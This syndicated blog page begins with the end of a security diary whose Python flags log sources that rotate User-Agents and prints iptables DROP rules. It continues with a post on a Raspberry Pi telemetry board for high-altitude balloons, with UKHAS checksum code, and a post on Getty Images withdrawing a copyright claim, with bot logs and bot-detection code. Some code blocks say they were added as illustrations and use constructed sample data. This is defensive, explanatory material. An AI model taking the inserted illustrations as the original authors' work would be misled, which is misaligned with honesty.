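    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A real product token looks like "Name/version"; strings without one are suspect.
PRODUCT_RE = re.compile(r"[A-Za-z][A-Za-z0-9.+-]*/\d")


def parse_combined(text):
    """Yield one dict per well-formed combined-log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def looks_like_ua(ua):
    """True if the User-Agent carries at least one product/version token."""
    return bool(PRODUCT_RE.search(ua))


def profile_sources(text):
    """Per source IP: hit count, distinct agents, distinct paths, nonsense-agent count."""
    prof = defaultdict(lambda: {"hits": 0, "uas": set(), "paths": set(), "odd_uas": 0})
    for rec in parse_combined(text):
        p = prof[rec["ip"]]
        p["hits"] += 1
        p["uas"].add(rec["ua"])
        p["paths"].add(rec["path"])
        if not looks_like_ua(rec["ua"]):
            p["odd_uas"] += 1
    return prof


def flag_scanners(text, min_distinct_ua=3):
    """Sorted list of sources that rotate agents, or that present a nonsense
    agent while touching nothing but "/". A browser keeps one agent for a
    session and goes on to fetch the page's stylesheets and images."""
    flagged = []
    for ip, p in profile_sources(text).items():
        rotating = len(p["uas"]) >= min_distinct_ua
        root_only_with_odd_ua = p["paths"] <= {"/"} and p["odd_uas"] > 0
        if rotating or root_only_with_odd_ua:
            flagged.append(ip)
    return sorted(flagged)


def block_rules(ips):
    """iptables commands dropping the flagged sources on the probed ports.
    Review the list by hand first: a shared NAT address can hide real users."""
    return [
        f"iptables -I INPUT -s {ip} -p tcp -m multiport --dports 21,22,443 -j DROP"
        for ip in ips
    ]


if __name__ == "__main__":
    for rule in block_rules(flag_scanners(SAMPLE_LOG)):
        print(rule)
```

Feed it your own access log in place of the constructed sample; the distinct-agent threshold is the knob that matters, since a handful of legitimate crawlers also vary their agent strings between runs.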

Chris Mohan — Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Raspberry Pi: Pi in the Sky: hardware for high-altitude balloonists from Dave Akerman

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Liz: Regular readers will be very familiar with the name Dave Akerman. Dave has been sending Raspberry Pis to the stratosphere under weather balloons since we launched the Pi in 2012, and his work in helping schools develop their own in-house space programs has been fantastic to watch. He and his friend Anthony Stirk have just produced a telemetry add-on board for the Raspberry Pi to help schools (and everybody else) reproduce the sort of spectacular results you’ve seen from him before. Here he is to introduce it: over to you, Dave!

High Altitude Ballooning is an increasingly popular hobby (I nearly said that interest has been “ballooning”, but fortunately I stopped myself just in time …), bringing what is termed “near space” within the reach of pretty much anyone who is willing to put in the effort and spend a moderate amount of money.

Although it’s possible to successfully fly and retrieve a balloon with a simple GSM/GPS tracker, the chances are that this will end in failure and tears. GSM coverage in the UK is nowhere near 100%, especially in rural areas which is where we want (and aim) the flights to land. The next step up, in reliability and price, is a “Spot” tracker which works solely via satellites, but those don’t work if they land upside down. Also, neither of these solutions will tell you how high the flight got, or record any science data (e.g. temperature, pressure), or indeed tell you anything about the flight until they land. If you’re lucky. A lost flight is a sad thing indeed.

For some countries (e.g. USA, but not the UK), if you are a licensed amateur radio operator you can fly an APRS tracker, in which case the flight will be tracked for you via the ground-based APRS network run by other radio hams. Sadly UK laws prohibit radio hams transmitting from an airborne vehicle, so APRS is out for us.

For these reasons, pretty much everyone involved in the hobby in the UK, and many other countries, uses radio trackers operating in an ISM (Industrial, Scientific and Medical) band where airborne usage is allowed. These work throughout the flight, transmitting GPS co-ordinates plus temperature and anything else that you can add a sensor for. Many radio trackers can also send down live images, meaning that you can see what your flight is seeing without having to wait for it to land. Here’s a diagram showing how telemetry from the flight ends up as a balloon icon on a Google map:

tracking system

What’s not shown here is that, provided you tell them, the other balloonists will help track for you. So not only will you be receiving telemetry and images directly via your own radio receiver, but others will too. All received data is collated on a server so if you do lose contact with the flight briefly then it doesn’t matter. However, this does not mean you can leave the tracking up to others! You’ll need to receive at the launch site (you have to make sure it’s working!) and also in the chase car once it lands. The expense of doing this is small – a TV dongle for £12 or so will do it, with a £15 aerial and a laptop, ideally with a 3G dongle or tethered to a phone.

Traditionally, balloonists build their own radio trackers, and for anyone with the skills or the time and ability to learn programming and some digital electronics, this is definitely the most rewarding route to take. Imagine receiving pictures of the Earth from 30km up, using a piece of kit that you designed and built and programmed! So if you are up to this challenge (and I suspect that most people reading are) then I recommend that you do just that. It takes a while, but during the development you’ll have plenty of time to research other aspects of the hobby (how to predict the flight path, and obtain permission, and fill the balloon, etc.). And when you’re done, you can hold in your hand something that is all your own work and has, to all intents and purposes, been to space.

For some though, it’s just not practical to develop a new tracker. Or you might be a programming whizz, but not know which end of a soldering iron to pick up. It was with these people in mind that we (myself and Anthony Stirk – another high altitude balloonist) developed our “Pi In The Sky” telemetry board. Our principal aim is to enable schools to launch balloon flights with radio trackers, without having to develop the hardware and software first. It is also our hope that older children and students will write their own software or at least modify the provided (open source) software, perhaps connecting and writing code for extra sensors (the board has an i2c connection for add-ons).

The board and software are based on what I’ve been flying since my first “Pi In The Sky” flight over 2 years ago, so the technology has been very well proven (approximately 18 flights and no losses other than deliberate ones!). So far the board itself has clocked up 5 successful flights, with the released open-source software on 3 of those. Here’s the board mounted to a model B (though we very strongly recommend use of a model A, which consumes less power and weighs less):

Pi in the Sky board

It comes in a kit complete with a GPS antenna, SMA pigtail (from which you can easily make your own radio aerial), stand-offs for a rigid mounting to the Pi board, and battery connectors. Software is on https://github.com/piinthesky, with installation instructions at http://www.pi-in-the-sky.com/index.php?id=support, or there is a pre-built SD card image for the tragically lazy. We do recommend manual installation as you’ll learn a lot.

By now you’re probably itching to buy a board and go fly it next weekend. Please don’t. Well, buy the board by all means, but from the moment you decide that this is the project for you, you should task yourself with finding out all you can about how to make your flight a safe success. For a start, this means learning about applying for flight permission (which, if you want to launch from your garden at the end of an airport runway, isn’t going to be given). Permission is provided together with a NOTAM (NOtice To AirMen) which tells said pilots what/where/when your launch will be, so they can take a different path. You also need to learn about predicting the flight path so that it lands well away from towns or cities or motorways or airports. I hope I don’t need to explain how important all of this is.

There’s lots more to learn about too, for example:

  • How to track the flight
  • How to fill a balloon
  • Where to buy the balloon
  • What size balloon? What size parachute? How to tie it all together?

None of this is complicated (it’s not, ahem “rocket science”), but there is a lot to know. Don’t be surprised if the time between “I’ll do it!” and “Wow, I did it!” is measured in months. Several of them. In fact, worry if it’s less than that – this research takes time. We will be producing some teaching materials, but meantime please see the following links:

As for the board, it provides a number of features borne out of a large number of successful flights:

  • Efficient built-in power regulator providing run time of over 20 hours from 4 AA cells (using a model A Pi)
  • Highly sensitive UBlox GPS receiver approved for altitudes up to 50km
  • Temperature compensated, license-free (Europe) frequency agile, 434MHz radio transmitter
  • Temperature sensor
  • Battery voltage monitoring
  • Sockets for external i2c devices, analog input, external temperature sensor
  • Allows use of Raspberry Pi camera
  • Mounting holes and spacers for a solid connection to the Pi

The open-source software provides these features:

  • Radio telemetry with GPS and sensor data using UKHAS standard
  • Radio image download using SSDV standard
  • Multi-threaded to maximize use of the radio bandwidth
  • Variable image size according to altitude
  • Stores full-definition images as well as smaller transmitted images
  • Automatically chooses better images for download
  • Configurable via text file in the Windows-visible partition of the SD card
  • Supplied as github repository with instructions, or SD card image
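An added illustration of the telemetry format the software list refers to; this is not the Pi In The Sky software itself. The UKHAS sentence, as documented on the UKHAS wiki, is `$$callsign,sequence,time,latitude,longitude,altitude[,...]*XXXX`, where `XXXX` is a CRC16-CCITT (polynomial 0x1021, initial value 0xFFFF, no reflection) computed over the text between `$$` and `*`. The code builds such a sentence and verifies one on receipt, rejecting corrupted ones. The callsign, positions and extra sensor values are made up for the example.

```python
"""Build and verify a UKHAS-style telemetry sentence with its CRC16-CCITT checksum."""


def crc16_ccitt(data: bytes, poly: int = 0x1021, init: int = 0xFFFF) -> int:
    """CRC-16/CCITT-FALSE: 16-bit, polynomial 0x1021, initial value 0xFFFF,
    MSB first, no reflection, no final XOR. Check value for b"123456789" is 0x29B1."""
    crc = init
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ poly) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


def build_sentence(callsign, seq, utc, lat, lon, alt, *extra):
    """Join the fields, append '*' and the 4-hex-digit CRC, terminate with newline.
    Extra positional values (temperature, battery voltage, ...) follow altitude."""
    fields = [callsign, str(seq), utc, f"{lat:.5f}", f"{lon:.5f}", str(int(alt))]
    fields += [str(x) for x in extra]
    body = ",".join(fields)
    return f"$${body}*{crc16_ccitt(body.encode('ascii')):04X}\n"


class TelemetryError(ValueError):
    """Raised for a sentence that is malformed or fails its checksum."""


def parse_sentence(line):
    """Validate framing and CRC, then return the standard fields as a dict.
    Anything that does not verify is rejected rather than partially parsed."""
    line = line.strip()
    if not line.startswith("$$"):
        raise TelemetryError("missing $$ prefix")
    body, star, given = line[2:].rpartition("*")
    if not star or len(given) != 4:
        raise TelemetryError("missing or malformed checksum")
    try:
        given_val = int(given, 16)
    except ValueError:
        raise TelemetryError("checksum is not hex") from None
    try:
        raw = body.encode("ascii")
    except UnicodeEncodeError:
        raise TelemetryError("non-ASCII payload") from None
    if given_val != crc16_ccitt(raw):
        raise TelemetryError("checksum mismatch")
    fields = body.split(",")
    if len(fields) < 6:
        raise TelemetryError("too few fields")
    return {
        "callsign": fields[0],
        "seq": int(fields[1]),
        "time": fields[2],
        "lat": float(fields[3]),
        "lon": float(fields[4]),
        "alt": int(fields[5]),
        "extra": fields[6:],
    }


if __name__ == "__main__":
    # Invented flight values: callsign PISKY, 30 km up, 21.5 C internal temperature.
    sent = build_sentence("PISKY", 42, "12:34:56", 51.5, -1.2, 30123, 21.5)
    print(sent.strip())
    print(parse_sentence(sent))
```

The checksum catches corruption from a noisy radio link; it does not authenticate the sender. Anyone with a 434 MHz transmitter can emit a correctly checksummed sentence under your callsign, so treat a sudden position jump on the shared tracking map as suspect rather than as verified data.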

Finally, anyone interested in high altitude ballooning, using our board or not, should come to the UKHAS Conference on 16th August 2014 at the University of Greenwich. Anthony and I will be presenting our board during the morning sessions, and will run a workshop on the board in the afternoon. For tickets click here.

The Hacker Factor Blog: A Victory for Fair Use

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Last week I reported on a copyright infringement letter that I had received from Getty Images. The extremely hostile letter claimed that I was using a picture in violation of their copyright, ordered me to “cease and desist” using the picture, and demanded that I pay $475 in damages. Various outlets have referred to this letter as trolling and extortion.

Not being an attorney, I contacted my good friend, Mark D. Rasch. Mark is a well-known attorney in the computer security world. Mark headed the United States Department of Justice Computer Crime Unit for nine years and prosecuted cases ranging from computer crime and fraud to digital trespassing and viruses. If you’re old enough, then you remember the Hanover Hackers mentioned in The Cuckoo’s Egg, Robert Morris Jr. (first Internet worm), and Kevin Mitnick — Mark worked all of those prosecutions. He regularly speaks at conferences, appears in news interviews, and has taught cyberlaw to law enforcement and big universities. (If I were a big company looking for a chief privacy officer, I would hire him in a second.)

This letter from Getty had me concerned. But I can honestly say that, in the 12 years that I’ve known him, I have never seen Mark so animated about an issue. I have only ever seen him as a friendly guy who gives extremely informative advice. This time, I saw a side of Mark that I, as a friend, have never experienced. I would never want to be on the other side of the table from him. And even being on the same side was really intimidating. (Another friend told me that Mark has a reputation for being an aggressive bulldog. And this was my first time seeing his teeth.) His first advice to me was very straightforward. He said, “You have three options. One, do nothing. Two, send back a letter, and three, sue them.” Neither of us were fond of option #1. After a little discussion, I decided to do option #2 and prepare for #3.

First I sent the response letter. Then I took Mark’s advice and began to prepare for a lawsuit. Mark wanted me to take the initiative and file for a “Copyright Declaratory Judgment”. (Don’t wait for Getty.) In effect, I wanted the court to declare my use to be Fair Use.

Getty’s Reply

I honestly expected one of three outcomes from my response letter to Getty Images. Either (A) Getty would do nothing, in which case I would file for the Declaratory Judgment, or (B) Getty would respond with their escalation letter, demanding more money (in which case I would still file for the Declaratory Judgment), or (C) Getty would outright sue me, in which case I would respond however my attorney advised.

But that isn’t what happened. Remarkably, Getty backed down! Here’s the letter that they sent me (I’m only censoring email addresses):

From: License Compliance
To: Dr. Neal Krawetz
Subject: [371842247 Hacker Factor ]
Date: Tue, 22 Jul 2014 20:51:13 +0000

Dr. Krawetz:

We have reviewed your email and website and are taking no further action. Please disregard the offer letter that has been presented in this case. If you have any further questions or concerns, please do not hesitate to contact us.

Nancy Monson
Copyright Compliance Specialist
Getty Images Headquarters
605 Fifth Avenue South, Suite 400
Seattle WA 98104 USA
Phone 1 206 925 6125
Fax 1 206 925 5001
[redacted]@gettyimages.com

For more information about the Getty Images License Compliance Program, please visit http://company.gettyimages.com/license-compliance

Helpful information about image copyright rules and how to license stock photos is located at www.stockphotorights.com and Copyright 101.

Getty Images is leading the way in creating a more visual world. Our new embed feature makes it easy, legal, and free for anybody to share some of our images on websites, blogs, and social media platforms.
http://www.gettyimages.com/Creative/Frontdoor/embed

(c)2014 Getty Images, Inc.

PRIVILEGED AND CONFIDENTIAL
This message may contain privileged or confidential information and is intended only for the individual named. If you are not the named addressee or an employee or agent responsible for delivering this message to the intended recipient you should not disseminate, distribute or copy this e-mail or any attachments hereto. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail and any attachments from your system without copying or disclosing the contents. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. Getty Images, 605 5th Avenue South, Suite 400. Seattle WA 98104 USA, www.gettyimages.com. PLEASE NOTE that all incoming e-mails will be automatically scanned by us and by an external service provider to eliminate unsolicited promotional e-mails (“spam”). This could result in deletion of a legitimate e-mail before it is read by its intended recipient at our firm. Please tell us if you have concerns about this automatic filtering.

Mark Rasch also pointed out that Getty explicitly copyrighted their email to me. However, the same Fair Use that permits me to use their pictures also permits me to post their entire email message. And that whole “PRIVILEGED AND CONFIDENTIAL” paragraph? That’s garbage and can be ignored because I never agreed to their terms.

Findings

In preparing to file the Copyright Declaratory Judgment, I performed my due diligence by checking web logs and related files for information pertaining to this case. And since Getty has recanted, I am making some of my findings public.

Automated Filing
First, notice how Getty’s second letter says “We have reviewed your email and website…” This clearly shows up in my web logs. Among other things, people at Getty are the only (non-bot) visitors to access my site via “nealkrawetz.org” — everyone else uses “hackerfactor.com”. In each case, the Getty users initially went directly to my “In The Flesh” blog entry (showing that they were not searching or just browsing my site.) Their automated violation bot also used nealkrawetz.org. The big catch is that nobody at Getty ever reviewed “In The Flesh” prior to mailing their extortion letter.

In fact, I can see exactly when their bot visited my web site. Here are all of my logs related to their bot:

2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:44 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/archives/423-In-The-Flesh.html | http://ops.picscout.com/QcApp/PreReport/Index/371842247?normalFlow=True
2014-06-14 23:06:39 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/categories/18-Phones | http://ops.picscout.com/QcApp/Infringer/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247

This listing shows:

  • The date/time (in PST)
  • The bot’s IP address (two in Israel and one in India; none from the United States)
  • The user-agent string sent by the bot
  • Where they went — most went to “/” (my homepage), but there is exactly one that went to “/blog/index.php?/archives/423-In-The-Flesh.html”. That’s when they compiled their complaint.
  • The “Referer” string, showing what they clicked in order to get to my site. Notice how their accesses are associated with a couple of complaint numbers. “371842247” is the number associated with their extortion letter. However, “371654690” appears to be a second potential complaint.

Getty’s complaint has a very specific timestamp on the letter. It doesn’t just have a date. Instead, it says “7/10/2014 11:05:05am” — a very specific time. The clocks may be off by a few seconds, but that “11:05” matches my log file — it is off by exactly 12 hours. (The letter is timestamped 11:05am, and my logs recorded 11:05pm.) This shows that the entire filing process is automated.

When I use my bank’s online bill-pay system, it asks me when I want to have the letter delivered. Within the United States, it usually means mailing the letter four days earlier. I believe that Getty did the exact same thing. They scanned my web site and then mailed their letter so it would be delivered exactly one-month later, and dated the letter 4 days 12 hours before delivery.

Getty’s automated PicScout system is definitely a poorly-behaved web bot. At no time did Getty’s PicScout system retrieve my robots.txt file, showing that it fails to abide by Internet standards. I am also certain that this was a bot since a human’s web browser would have downloaded my blog’s CSS style sheet. (PicScout only downloaded the web page.)
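The bot fingerprinting described here (no robots.txt fetch, no stylesheet or image requests, every visit arriving from an ops.picscout.com referer that carries a case number) can be applied mechanically. The following is an added example and not the author’s own tooling: it parses the pipe-delimited lines printed above, plus two constructed lines for a browser session from an RFC 5737 documentation address with an invented stylesheet path, labels each source, and pulls the case numbers out of the referers.

```python
"""Label sources in the post's pipe-delimited web log as bot-like or browser-like."""
import re
from collections import defaultdict

# Ten lines are the PicScout hits reproduced from the post
# (date time | ip | user-agent | request | referer). The last two lines are a
# constructed browser session from an RFC 5737 address, added only to show what
# a human visit looks like by contrast; the stylesheet path is invented.
LOG = """\
2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:44 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/archives/423-In-The-Flesh.html | http://ops.picscout.com/QcApp/PreReport/Index/371842247?normalFlow=True
2014-06-14 23:06:39 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/categories/18-Phones | http://ops.picscout.com/QcApp/Infringer/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-07-15 09:00:00 | 192.0.2.10 | Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 | GET /blog/index.php?/archives/423-In-The-Flesh.html | -
2014-07-15 09:00:01 | 192.0.2.10 | Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 | GET /blog/style.css | http://www.hackerfactor.com/blog/index.php?/archives/423-In-The-Flesh.html
"""

ASSET_RE = re.compile(r"\.(css|js|png|jpe?g|gif|ico)(\?|$)")
HOST_RE = re.compile(r"https?://([^/]+)")
CASE_RE = re.compile(r"/Index/(\d+)")


def parse_log(text):
    """One dict per line with exactly five ' | ' separated columns."""
    recs = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(" | ")]
        if len(parts) != 5:
            continue
        ts, ip, ua, req, ref = parts
        method, _, path = req.partition(" ")
        recs.append({"ts": ts, "ip": ip, "ua": ua, "method": method,
                     "path": path, "referer": ref})
    return recs


def fingerprint(recs):
    """Per source IP: hits, whether robots.txt or any page asset was fetched,
    the referer hosts seen, and any case numbers embedded in the referers."""
    prof = defaultdict(lambda: {"hits": 0, "robots": False, "assets": False,
                                "referer_hosts": set(), "cases": set()})
    for r in recs:
        p = prof[r["ip"]]
        p["hits"] += 1
        if r["path"] == "/robots.txt":
            p["robots"] = True
        if ASSET_RE.search(r["path"]):
            p["assets"] = True
        host = HOST_RE.match(r["referer"])
        if host:
            p["referer_hosts"].add(host.group(1))
        case = CASE_RE.search(r["referer"])
        if case:
            p["cases"].add(case.group(1))
    return prof


def classify(prof, min_hits=2):
    """'browser' if page assets were fetched; 'bot' if a repeat visitor fetched
    neither assets nor robots.txt; 'unknown' for single hits with no signal."""
    labels = {}
    for ip, p in prof.items():
        if p["assets"]:
            labels[ip] = "browser"
        elif not p["robots"] and p["hits"] >= min_hits:
            labels[ip] = "bot"
        else:
            labels[ip] = "unknown"
    return labels


if __name__ == "__main__":
    profiles = fingerprint(parse_log(LOG))
    for ip, label in classify(profiles).items():
        print(ip, label, sorted(profiles[ip]["cases"]), sorted(profiles[ip]["referer_hosts"]))
```

The asset check is the strongest single signal: a headless fetcher that only wants the HTML never asks for the stylesheet, while a human's browser asks for it within a second of the page.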

Failure to perform due diligence
I want to emphasize that there are no other accesses to that blog entry by any address associated with Getty within months before their complaint. As of this year (from January 2014 to July 23, 2014), people at Getty have only visited the “In The Flesh” web page 13 times: once by the PicScout bot, and 12 times after they received my reply letter. This shows that Getty never viewed the web page prior to sending their letter. In effect, their “infringement” letter is nothing more than trolling and an attempt to extort money. They sent the letter without ever looking at the context in which the picture is used.

My claim that Getty never manually reviewed my web site prior to mailing is also supported by their second letter, where they recanted their claim of copyright infringement. Having actually looked at my blog, they realized that it was Fair Use.

My web logs are not my only proof that no human at Getty viewed the blog page in the months prior to sending the complaint. Getty’s threatening letter mentions only one single picture that is clearly labeled with Getty’s ImageBank watermark. However, if any human had visited the web page, then they would have seen FOUR pictures that are clearly associated with Getty, and all four pictures were adjacent on the web page! The four pictures are:

The first picture clearly says “GettyImages” in the top left corner. The second picture (from their complaint) is watermarked with Getty’s ImageBank logo. The third and fourth pictures come from Getty’s iStockPhoto service. Each photo was properly used as part of the research results in that blog entry. (And right now, they are properly used in the research findings of this blog entry.)

After Getty received my reply letter, they began to visit the “In The Flesh” URL from 216.169.250.12 — Getty’s corporate outbound web proxy address. Based on the reasonable assumption that different browser user-agent strings indicate different people, I observed them repeatedly visiting my site in groups of 3-5 people. Most of them initially visited the “In The Flesh” page at nealkrawetz.org; a few users visited my “About Me” and “Services” web pages. I am very confident that these indicate their attorneys reviewing my reply letter and web site. This is the absolute minimum evaluation that Getty should have done before sending their extortion letter.

Legal Issues
Besides pointing out how my blog entry clearly falls under Fair Use, my attorney noted a number of items that I (as a non-lawyer person) didn’t see. For example:

  • In Getty’s initial copyright complaint, they assert that they own the copyright. However, the burden of proof is on Getty Images. Getty provided no proof that they are the actual copyright holder, that they acquired the rights legally from the photographer, that they never transferred rights to anyone else, that they had a model release letter from the woman in the photo, that the picture was never made public domain, and that the copyright had not expired. In effect, they never showed that they actually have the copyright.
  • Getty’s complaint letter claims that they have searched their records and found no license for me to use that photo. However, they provided no proof that they ever searched their records. At minimum, during discovery I would demand a copy of all of their records so that I could confirm their findings and proof of their search. (Remember, the burden of proof is on Getty, not on me.) In addition, I have found public comments that explicitly identify people with valid licenses who reported receiving these hostile letters from Getty. This brings up the entire issue regarding how Getty maintains and searches their records.
  • Assuming some kind of violation (and I am not admitting any wrong here), there is a three-year statute of limitations regarding copyright infringement. My blog entry was posted on March 18, 2011. In contrast, their complaint letter was dated July 10, 2014 — that is more than three years after the pictures were posted on my site.

Known Research
Copyright law permits Fair Use for many purposes, including “research”. Even Getty’s own FAQ explicitly mentions “research” as an acceptable form of Fair Use. The question then becomes: am I a researcher and does my blog report on research? (Among other things, this goes toward my background section in the Copyright Declaratory Judgment filing.)

As it turns out, my web logs are extremely telling. I can see each time anyone at any network address associated with Getty Images visits my site. For most of my blog entries, I either get no Getty visitors or a few visitors. However, each time I post an in-depth research entry on digital photo forensics, I see large groups of people at Getty visiting the blog entry. I can even see when one Getty person comes through, and then a bunch of other Getty people visit my site — suggesting that one person told his coworkers about the blog entry. In effect, employees at Getty Images have been regular readers of my blog since at least 2011. (For discovery, I would request a forensic image of every computer in Getty’s company that has accessed my web site in order to determine if they used my site for research.)

Getty users also use my online analysis service, FotoForensics. This service is explicitly a research service. There are plenty of examples of Getty users accessing the FotoForensics site to view analysis images, read tutorials, and even upload pictures with test files that have names like “watermark.jpg” and “watermark-removed.jpg”. This explicitly shows that they are using my site as a research tool.

(For the ultra paranoid people: I have neither the time nor the desire to track down every user in my web logs. But if you send me a legal threat, I will grep through the data.)

However, the list does not stop there. For example, the Harvard Reference Guide lists me as the example for citing research from a blog. (PDF: see PDF page 44, document page 42.) Not only does Getty use my site as a research resource, Harvard’s style guide uses me as the example for a research blog (my bold for emphasis).

Blogs are NOT acceptable academic sources unless as objects of research

Paraphrasing, Author Prominent:
Krawetz (2011) uses a blog to discuss advanced forensic image analysis techniques.

Paraphrasing, Information Prominent:
Blogs may give credence to opinion, in some cases with supporting evidence; for example the claim that many images of fashion models have been digitally enhanced (Krawetz 2011).

Reference List Model:
Krawetz, N 2011, ‘The hacker factor blog’, web log, viewed 15 November 2011, http://www.hackerfactor.com/blog/

I should also point out that the AP and Reuters have both been very aware of my blog — including a VP at the AP — and neither has accused me of copyright infringement. They appear to recognize this as Fair Use. Moreover, with one of my blog entries on a Reuters photo (Without a Crutch), a Reuters editor referred to the blog entry as a “Great in-depth analysis” on Reuters’ web site (see Sep 30, 2011) and on her twitter feed. This shows that Getty’s direct competition recognizes my blog as a research resource.

SLAPP
One of the things my attorney mentioned was California’s Anti-SLAPP law. Wikipedia explains SLAPP, or Strategic Lawsuit Against Public Participation, as “a lawsuit that is intended to censor, intimidate, and silence critics by burdening them with the cost of a legal defense until they abandon their criticism or opposition.” Wikipedia also says:

The plaintiff’s goals are accomplished if the defendant succumbs to fear, intimidation, mounting legal costs or simple exhaustion and abandons the criticism. A SLAPP may also intimidate others from participating in the debate. A SLAPP is often preceded by a legal threat. The difficulty is that plaintiffs do not present themselves to the Court admitting that their intent is to censor, intimidate or silence their critics.

In this case, Getty proceeded to send me a legal threat regarding alleged copyright infringement. Then they demanded $475 and threatened more actions if I failed to pay it. In contrast, it would cost me $400 to file for a Declaratory Judgment (more if I lived in other states), and costs could rise dramatically if Getty filed a lawsuit against me. In either scenario, it places a financial burden on me if I want to defend my First Amendment rights.

In the United States, California has special anti-SLAPP legislation. While not essential, it helps that Getty has offices in California and a network trace shows that some packets went from Getty to my blog through routers in California. As Wikipedia explains:

To win an anti-SLAPP motion, the defendant must first show that the lawsuit is based on claims related to constitutionally protected activities, typically First Amendment rights such as free speech, and typically seeks to show that the claim lacks any basis of genuine substance, legal underpinnings, evidence, or prospect of success. If this is demonstrated then the burden shifts to the plaintiff, to affirmatively present evidence demonstrating a reasonable probability of succeeding in their case by showing an actual wrong would exist as recognized by law, if the facts claimed were borne out.

This isn’t even half of his legal advice. I could barely take notes fast enough as he remarked about topics like Rule 11, tortious interference with a business relationship, Groucho Marx’s reply to Warner Brothers, and how Getty’s repeated access to my web site could be their way to inflate potential damage claims (since damages are based on the number of views).

A Little Due Diligence Goes A Long Way

Although this entire encounter with Getty Images took less than two weeks, I was preparing for a long battle. I even contacted the Electronic Frontier Foundation (EFF) to see if they could assist. The day after Getty recanted, I received a reply from the EFF: no less than four attorneys wanted to help me. (Thank you, EFF!)

